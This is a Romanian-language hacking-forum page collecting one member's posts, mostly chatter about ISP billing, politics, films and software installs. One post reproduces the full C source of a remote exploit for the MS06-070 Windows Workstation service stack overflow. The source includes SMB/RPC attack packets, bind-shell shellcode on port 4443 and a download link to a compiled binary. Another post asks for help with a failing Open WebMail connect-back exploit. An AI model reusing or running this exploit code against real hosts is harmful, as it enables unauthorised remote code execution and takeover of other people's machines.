Jump to content

Christian

Active Members
  • Posts

    90
  • Joined

  • Last visited

Posts posted by Christian

  1. si eu am conexiune tot prin PPPoE (nu ierdeesh) cu 3 feluri de tarifare

    1. Net non-stop = 10$

    2. 12 ore/zi = 7$

    3. 200 ore/luna = 7$

    insa am inteles ca la a 3-a varianta exista o smecherie prin care poti sa te conectezi chiar daca ai terminat cele 200 ore ..stie cineva ceva??

  2. flyppy wrote: man srry da putina gramatica nu tiar strica...

    sincer nici tie nu ti-ar strica :@

    probabil ca nu merge numai in LAN ..ip-ul caruia ii dai shutdown trebuie sa aiba portul 135 (sau 445 ..nu`s sigur) deschis..insa majoritatea providerilor blocheaza porturile astea si in cele mai multe cazuri n`o sa mearga

  3. beerlover0008 wrote: Da, a facut multe case dar el are drepturile de proprietate, cum nu ii convine ceva poate sa arunce acei oameni in strada...

    nu cred ca ar face asta ..el se straduieste sa creasca in ochii romanilor ..iti dai seama cum l-ar privi romanii daca i-ar da afara din case

    beerlover0008 wrote: A mai cumparat si el un partid, l-am vazut intr-un filmulet facut inainte de 1989 cum el se destra cu tovarasii generali.

    da` ce ... tu nu te distrezi ? ;)

    beerlover0008 wrote: Parerea mea ca el se crede mai degraba un profet, foloseste religia doar sa para el mare om.

    parerea ta! ;)

    beerlover0008 wrote: Eu nu vad rostul exorcizarii unui stadion inainte de meci si multe porcarii ce mai face el.

    stie el ce stie..uite ca l-a ajutat dumnezeu si azi ..a facut egal cu pandurii :@ mare noroc

    beerlover0008 wrote: Ma intreb cum si-a facut el averea, oare oile lui aveau lana de aur? :D

    cu siguranta nu au lana de aur dar are el rotitzele din cap bine unse

    concluzia ... JIJI RULZZZZZZZ !!! :@

  4. /***************************************************************************

    Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploit

    by cocoruder(frankruder_at_hotmail.com),2006.11.15
    page:[url]http://ruder.cdut.net/default.asp[/url]

    Code fixed by S A Stevens - 17.11.2006 - changed shellcode, Changed code to
    correct jmp EBX address and fixed exploit output status.

    Should work on Windows 2000 Server SP4 (All Languages)


    usage:
    ms06070 targetip DomainName

    notice:
    Make sure the DomainName is valid and live,more informations see
    [url]http://research.eeye.com/html/advisories/published/AD20061114.html[/url],
    cocoruder just research the vulnerability and give the exploit for
    Win2000.
    ****************************************************************************/


    #include <stdio.h>
    #include <windows.h>
    #include <winsock.h>
    #include <tchar.h>
    #pragma comment(lib, "wsock32.lib")


    unsigned char SmbNeg[] =
    "x00x00x00x2fxffx53x4dx42x72x00"
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    "x00x00x00x00x88x05x00x00x00x00x00x0cx00x02x4ex54"
    "x20x4cx4dx20x30x2ex31x32x00";


    unsigned char Session_Setup_AndX_Request[]=
    "x00x00x00x48xffx53x4dx42x73x00"
    "x00x00x00x08x00x00x00x00x00x00x00x00x00x00x00x00"
    "x00x00xffxffx88x05x00x00x00x00x0dxffx00x00x00xff"
    "xffx02x00x88x05x00x00x00x00x00x00x00x00x00x00x00"
    "x00x01x00x00x00x0bx00x00x00x6ex74x00x70x79x73x6d"
    "x62x00";


    unsigned char TreeConnect_AndX_Request[]=
    "x00x00x00x58xffx53x4dx42x75x00"
    "x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
    "x00x00x00x00xffxfex00x08x00x03x04xffx00x58x00x08"
    "x00x01x00x2dx00x00x5cx00x5cx00x31x00x37x00x32x00"
    "x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x36x00"
    "x5cx00x49x00x50x00x43x00x24x00x00x00x3fx3fx3fx3f"
    "x3fx00";


    unsigned char NTCreate_AndX_Request[]=
    "x00x00x00x64xffx53x4dx42xa2x00"
    "x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
    "x00x00x00x08x04x0cx00x08x00x01x18xffx00xdexdex00"
    "x0ex00x16x00x00x00x00x00x00x00x9fx01x02x00x00x00"
    "x00x00x00x00x00x00x00x00x00x00x03x00x00x00x01x00"
    "x00x00x40x00x40x00x02x00x00x00x01x11x00x00x5cx00"
    "x77x00x6bx00x73x00x73x00x76x00x63x00x00x00";


    unsigned char Rpc_Bind_Wkssvc[]=
    "x00x00x00x92xffx53x4dx42x25x00"
    "x00x00x00x18x01x20x00x00x00x00x00x00x00x00x00x00"
    "x00x00x01x08xf0x0bx03x08xf7x4cx10x00x00x48x00x00"
    "x04xe0xffx00x00x00x00x00x00x00x00x00x00x00x00x4a"
    "x00x48x00x4ax00x02x00x26x00x01x40x4fx00x5cx50x49"
    "x50x45x5cx00x05x00x0bx03x10x00x00x00x48x00x00x00"
    "x00x00x00x00xd0x16xd0x16x00x00x00x00x01x00x00x00"
    "x00x00x01x00x98xd0xffx6bx12xa1x10x36x98x33x46xc3"
    "xf8x7ex34x5ax01x00x00x00x04x5dx88x8axebx1cxc9x11"
    "x9fxe8x08x00x2bx10x48x60x02x00x00x00";


    unsigned char Rpc_NetrJoinDomain2_Header[]=
    "x00x00x00xa8xffx53x4dx42x25x00"
    "x00x00x00x18x07xc8x00x00x00x00x00x00x00x00x00x00"
    "x00x00x00x08x6cx07x00x08xc0x01x10x00x00x54x00x00"
    "x00x00x04x00x00x00x00x00x00x00x00x00x00x00x00x54"
    "x00x54x00x54x00x02x00x26x00x00x40x65x00x00x5cx00"
    "x50x00x49x00x50x00x45x00x5cx00x00x00x00x00x05x00"
    "x00x03x10x00x00x00x54x00x00x00x01x00x00x00x3cx00"
    "x00x00x00x00"
    "x16x00" //opnum,NetrJoinDomain2
    "x30x2ax42x00"
    "x0ex00x00x00"
    "x00x00x00x00"
    "x0ex00x00x00"
    "x5cx00x5cx00x31x00x37x00x32x00"
    "x2ex00x32x00x32x00x2ex00x35x00x2ex00x34x00x31x00"
    "x00x00"
    "x10x01x00x00"
    "x00x00x00x00"
    "x10x01x00x00";


    unsigned char Rpc_NetrJoinDomain2_End[]=
    "x00x00x00x00"
    "x00x00x00x00"
    "x00x00x00x00"
    "x01x00x00x00";


    unsigned char *lpDomainName=NULL;
    DWORD dwDomainNameLen=0;



    /* win32_bind - EXITFUNC=seh LPORT=4443 Size=344 Encoder=PexFnstenvSub [url]http://metasploit.com[/url] */
    unsigned char shellcode[] =
    "x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xe9"
    "x59x23xcex83xebxfcxe2xf4x15x33xc8x83x01xa0xdcx31"
    "x16x39xa8xa2xcdx7dxa8x8bxd5xd2x5fxcbx91x58xccx45"
    "xa6x41xa8x91xc9x58xc8x87x62x6dxa8xcfx07x68xe3x57"
    "x45xddxe3xbaxeex98xe9xc3xe8x9bxc8x3axd2x0dx07xe6"
    "x9cxbcxa8x91xcdx58xc8xa8x62x55x68x45xb6x45x22x25"
    "xeax75xa8x47x85x7dx3fxafx2ax68xf8xaax62x1ax13x45"
    "xa9x55xa8xbexf5xf4xa8x8exe1x07x4bx40xa7x57xcfx9e"
    "x16x8fx45x9dx8fx31x10xfcx81x2ex50xfcxb6x0dxdcx1e"
    "x81x92xcex32xd2x09xdcx18xb6xd0xc6xa8x68xb4x2bxcc"
    "xbcx33x21x31x39x31xfaxc7x1cxf4x74x31x3fx0ax70x9d"
    "xbax0ax60x9dxaax0axdcx1ex8fx31x32x95x8fx0axaax2f"
    "x7cx31x87xd4x99x9ex74x31x3fx33x33x9fxbcxa6xf3xa6"
    "x4dxf4x0dx27xbexa6xf5x9dxbcxa6xf3xa6x0cx10xa5x87"
    "xbexa6xf5x9exbdx0dx76x31x39xcax4bx29x90x9fx5ax99"
    "x16x8fx76x31x39x3fx49xaax8fx31x40xa3x60xbcx49x9e"
    "xb0x70xefx47x0ex33x67x47x0bx68xe3x3dx43xa7x61xe3"
    "x17x1bx0fx5dx64x23x1bx65x42xf2x4bxbcx17xeax35x31"
    "x9cx1dxdcx18xb2x0ex71x9fxb8x08x49xcfxb8x08x76x9f"
    "x16x89x4bx63x30x5cxedx9dx16x8fx49x31x16x6exdcx1e"
    "x62x0exdfx4dx2dx3dxdcx18xbbxa6xf3xa6x19xd3x27x91"
    "xbaxa6xf5x31x39x59x23xce";


    DWORD fill_len_1 =0x84c; //fill data
    DWORD fill_len_2 =0x1000; //fill rubbish data
    DWORD addr_jmp_ebx=0x77F92A9B; //jmp ebx address,in ntdll.dll
    unsigned char code_jmp8[]= //jmp 8
    "xEBx06x90x90";

    unsigned char *Rpc_NetrJoinDomain2=NULL;
    DWORD dwRpc_NetrJoinDomain2=0;


    unsigned char recvbuff[2048];


    void showinfo(void)
    {
    printf("Microsoft Windows Wkssvc NetrJoinDomain2 Stack Overflow(MS06-070) Exploitn");
    printf("by cocoruder(frankruder_at_hotmail.com),2006.10.15n");
    printf("page:http://ruder.cdut.net/default.aspnn");
    printf("Code fixed by S A Stevens - 16.11.2006n");
    printf("Should work on Windows 2000 Server SP4 (All Languages)nn");
    printf("usage:n");
    printf("ms06070 targetip DomainNamenn");
    printf("notice:n");
    printf("Make sure the DomainName is valid and live,more informations seen");
    printf("http://research.eeye.com/html/advisories/published/AD20061114.html,n");
    printf("cocoruder just research the vulnerability and give the exploit for Win2000.nnn");

    }

    void neg ( int s )
    {
    char response[1024];

    memset(response,0,sizeof(response));

    send(s,(char *)SmbNeg,sizeof(SmbNeg)-1,0);
    }



    void MakeAttackPacket(char *lpDomainNameStr)
    {
    DWORD j,len,b_flag;



    dwDomainNameLen=(strlen(lpDomainNameStr)+2)*2;
    lpDomainName=(unsigned char *)malloc(dwDomainNameLen);

    memset(lpDomainName,0,dwDomainNameLen);

    MultiByteToWideChar(CP_ACP,0,lpDomainNameStr,-1,(LPWSTR)lpDomainName,dwDomainNameLen);

    *(unsigned char *)(lpDomainName+dwDomainNameLen-2)=0x5C;
    *(unsigned char *)(lpDomainName+dwDomainNameLen-4)=0x5C;

    len=dwDomainNameLen+ //DomainName
    fill_len_1-3*2+ //fill_len_1
    4+ //jmp 8
    4+ //addr jmp ebx
    sizeof(shellcode)-1+ //shellcode
    fill_len_2+ //fill_len_2
    2; //0x0000

    b_flag=0;
    if (len%2==1)
    {
    len++;
    b_flag=1;
    }


    dwRpc_NetrJoinDomain2=sizeof(Rpc_NetrJoinDomain2_Header)-1+
    len+
    sizeof(Rpc_NetrJoinDomain2_End)-1; //end


    //malloc
    Rpc_NetrJoinDomain2=(unsigned char *)malloc(dwRpc_NetrJoinDomain2);
    if (Rpc_NetrJoinDomain2==NULL)
    {
    printf("malloc error!n");
    return;
    }

    //fill nop
    memset(Rpc_NetrJoinDomain2,0x90,dwRpc_NetrJoinDomain2);


    j=sizeof(Rpc_NetrJoinDomain2_Header)-1;

    //update para1 length
    *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x0c)=len/2;
    *(DWORD *)(Rpc_NetrJoinDomain2_Header+j-0x04)=len/2;


    //copy header

    memcpy(Rpc_NetrJoinDomain2,Rpc_NetrJoinDomain2_Header,sizeof(Rpc_NetrJoinDomain2_Header)-1);

    j=sizeof(Rpc_NetrJoinDomain2_Header)-1;

    //copy DomainName
    memcpy(Rpc_NetrJoinDomain2+j,lpDomainName,dwDomainNameLen);
    j=j+dwDomainNameLen;

    //calculate offset
    j=j+fill_len_1-3*2;

    //jmp 8
    memcpy(Rpc_NetrJoinDomain2+j,code_jmp8,sizeof(code_jmp8)-1);
    j=j+4;

    //jmp ebx address
    *(DWORD *)(Rpc_NetrJoinDomain2+j)=addr_jmp_ebx;
    j=j+4;

    //copy shellcode
    memcpy(Rpc_NetrJoinDomain2+j,shellcode,sizeof(shellcode)-1);
    j=j+sizeof(shellcode)-1;

    //fill data
    memset(Rpc_NetrJoinDomain2+j,0x41,fill_len_2);
    j=j+fill_len_2;

    //0x0000(NULL)
    if (b_flag==0)
    {
    Rpc_NetrJoinDomain2[j]=0x00;
    Rpc_NetrJoinDomain2[j+1]=0x00;
    j=j+2;
    }
    else if (b_flag==1)
    {
    Rpc_NetrJoinDomain2[j]=0x00;
    Rpc_NetrJoinDomain2[j+1]=0x00;
    Rpc_NetrJoinDomain2[j+2]=0x00;
    j=j+3;
    }


    //copy other parameter

    memcpy(Rpc_NetrJoinDomain2+j,Rpc_NetrJoinDomain2_End,sizeof(Rpc_NetrJoinDomain2_End)-1);

    j=j+sizeof(Rpc_NetrJoinDomain2_End)-1;


    }



    void main(int argc,char **argv)
    {
    WSADATA ws;
    struct sockaddr_in server;
    SOCKET sock;
    DWORD ret;
    WORD userid,treeid,fid;


    WSAStartup(MAKEWORD(2,2),&ws);




    sock = socket(AF_INET,SOCK_STREAM,0);
    if(sock<=0)
    {
    return;
    }

    server.sin_family = AF_INET;
    server.sin_addr.s_addr = inet_addr(argv[1]);
    server.sin_port = htons((USHORT)445);

    printf("[+] Connecting %sn",argv[1]);

    ret=connect(sock,(struct sockaddr *)&server,sizeof(server));
    if (ret==-1)
    {
    printf("Connection Error, Port 445 Firewalled?n");
    return;
    }


    neg(sock);

    recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

    ret=send(sock,(char *)Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0);
    if (ret<=0)
    {
    printf("send Session_Setup_AndX_Request error!n");
    return;
    }
    recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

    userid=*(WORD *)(recvbuff+0x20); //get userid


    memcpy(TreeConnect_AndX_Request+0x20,(char *)&userid,2); //update userid


    ret=send(sock,(char *)TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0);
    if (ret<=0)
    {
    printf("send TreeConnect_AndX_Request error!n");
    return;
    }
    recv(sock,(char *)recvbuff,sizeof(recvbuff),0);

    treeid=*(WORD *)(recvbuff+0x1c); //get treeid


    //send NTCreate_AndX_Request
    memcpy(NTCreate_AndX_Request+0x20,(char *)&userid,2); //update userid
    memcpy(NTCreate_AndX_Request+0x1c,(char *)&treeid,2); //update treeid


    ret=send(sock,(char
    *)NTCreate_AndX_Request,sizeof(NTCreate_AndX_Request)-1,0);
    if (ret<=0)
    {
    printf("send NTCreate_AndX_Request error!n");
    return;
    }
    recv(sock,(char *)recvbuff,sizeof(recvbuff),0);


    fid=*(WORD *)(recvbuff+0x2a); //get fid


    //rpc bind

    memcpy(Rpc_Bind_Wkssvc+0x20,(char *)&userid,2);
    memcpy(Rpc_Bind_Wkssvc+0x1c,(char *)&treeid,2);
    memcpy(Rpc_Bind_Wkssvc+0x43,(char *)&fid,2);
    *(DWORD *)Rpc_Bind_Wkssvc=htonl(sizeof(Rpc_Bind_Wkssvc)-1-4);

    ret=send(sock,(char *)Rpc_Bind_Wkssvc,sizeof(Rpc_Bind_Wkssvc)-1,0);
    if (ret<=0)
    {
    printf("send Rpc_Bind_Wkssvc error!n");
    return;
    }
    recv(sock,(char *)recvbuff,sizeof(recvbuff),0);


    MakeAttackPacket((char *)argv[2]);


    memcpy(Rpc_NetrJoinDomain2+0x20,(char *)&userid,2);
    memcpy(Rpc_NetrJoinDomain2+0x1c,(char *)&treeid,2);
    memcpy(Rpc_NetrJoinDomain2+0x43,(char *)&fid,2);
    *(DWORD *)Rpc_NetrJoinDomain2=htonl(dwRpc_NetrJoinDomain2-4);

    *(WORD *)(Rpc_NetrJoinDomain2+0x27)=dwRpc_NetrJoinDomain2-0x58; //update Total Data Count
    *(WORD *)(Rpc_NetrJoinDomain2+0x3b)=dwRpc_NetrJoinDomain2-0x58; //update Data Count
    *(WORD *)(Rpc_NetrJoinDomain2+0x45)=dwRpc_NetrJoinDomain2-0x47; //update Byte Count
    *(WORD *)(Rpc_NetrJoinDomain2+0x60)=dwRpc_NetrJoinDomain2-0x58; //update Frag Length

    ret=send(sock,(char *)Rpc_NetrJoinDomain2,dwRpc_NetrJoinDomain2,0);
    if (ret<=0)
    {
    printf("send Rpc_NetrJoinDomain2 error!n");
    return;
    }

    printf("[+] Sent attack packet successfully, Try telnet on %s:4443?n",argv[1]);

    recv(sock,(char *)recvbuff,sizeof(recvbuff),0);




    closesocket(sock);

    }

    // milw0rm.com [2006-11-17]

    and the compiled version:

    http://share.urbanfriends.us/savefile_php/uploads/f783ca4bda.rar

  5. Shocker wrote:
    Christian wrote: ar mai fi o a 3-a varianta si anume ascunderea cu ajutorul comenzii attrib

    ex: dai in CMD comanda "attrib +H +S FolderName"

    astfel folderul o sa fie complet invizibil ;)

    Nu e complet inizibil.

    Prin comanda attrib +H +S il faci Hidden si System, insa daca dai de la Folder Options > Show hidden files and folders si debifeziHide protected operating system files o sa il vezi ;)

    yep` ...u`r right dar sa fim seriosi ..cati crezi ca stiu de optiunea aia ?eu unu` nu stiam ;)

  6. Chiar aveam nevoie de un exploit pt Open WebMail ... l-am testat pe Open WebMail version 1.81 si rezultatul este:

    [+] Listen on port: 4444

    [+] Prepairing ShellCode...Done!

    [+] Inject Shellcode to out host...Done!

    [+] Chmod our ShellCode on host...Done!

    [+] Exec ShellCode...Done!

    [+] Wait for Connect-back

    Can't Hack

    User defined signal 2

    any ideas ? :?

  7. 10x ppl ! majoritatea filmelor pe care le-ati mentionat nu le-am vazut asa ca am de downloadat nu gluma ..noroc cu provideru ca mi-a marit din nou viteza de download ;)

    btw daca mai stie cineva nume de filme peste care merita sa tragi un ochi cred ca nu s-ar supara nimeni daca le-ati posta aici

  8. recuento wrote:
    Christian wrote: :@ :@

    r u crazy dude?

    la 2 mb care ocupa ce stie sa faca? downloadeaza tot internetu ? ;)

    daca era detectabil 150% si vindeai pe datorie sa mor de nu`l cumparam eu

    daca serv ocupa 2 mb ...edit serv`ul cat ocupa? nu de alta dar sunt in criza de spatiu zilele astea :@

    Smart noob in caz ca nu ti-ai dat seama e 150% gluma probabil facuta din insistentele unora de a-l convinge sa le faca nu stiu ce.

    n00b ce ma faceam eu fara tine? probabil imi era mai bine

    mi-am dat seama ca era gluma si am replicat cu o alta gluma, n00b

  9. ce filme ati mai vazut in ultimul timp si v-au lasat o impresie placuta?

    poate sa ma indrume cineva spre 1-2 filme bune?(mai noi daca se poate) pt ca sincer m-am saturat sa vad filme de tot kktu`(si cand zic tot kktu` ma refer la TOT KKTU` !!!)nu vreau sa mai pierd timpul aiurea cu astfel de filme so ..give me some names !?!

  10. 10x virusz ptr programe

    eu unul ma impac bine cu rapidshare ...iau cu viteza maxima de pe ele (62 kB/s) pe cand de pe urban iau cu maxim 30 kB/s

    singurul dezavantaj este ca pe rapidshare fisierele expira destul de rpd

    apropo de VC++ ..in caz ca-l ia cineva..

    nu o sa mearga instalat doar ruland Setup.exe ..pt a-l instala urmati pasii:

    1.faci o copie a fisierului din setup/VS98ENT.STF si o redenumesti in acmsetup.STF

    2.copiaza tot ce contine folderul /setup/ in folderul precedent (cel care contine ACMBOOT.EXE)

    *.nu uita sa pui si acmsetup.STF in folderul care contine ACMBOOT.EXE

    3.instaleaza ruland fisierul acmsetup.exe sau Setup.exe

    4.Enjoy it!

    celelalte programe nu le-am testat si nu stiu daca fac probleme la instalare

  11. BizZaroO wrote: bai fratilor!!!! care e parola la al doilea joc? nu tre ca lvl 1 :((

    function Try(passwd) {
    if (passwd =="h4x0r") {
    alert("Alright! On to level 2...");
    location.href = "level2-xfdgnh.xhtml";
    }
    else {
    alert("The password is incorrect. Please don't try again.");
    location.href = "http://www.disney.com/";
    }

    asta o poti gasi in sursa paginii

    dar ce farec mai are jocul daca iti spune altcineva raspunsurile?

    incearca sa le descoperi singur

×
×
  • Create New...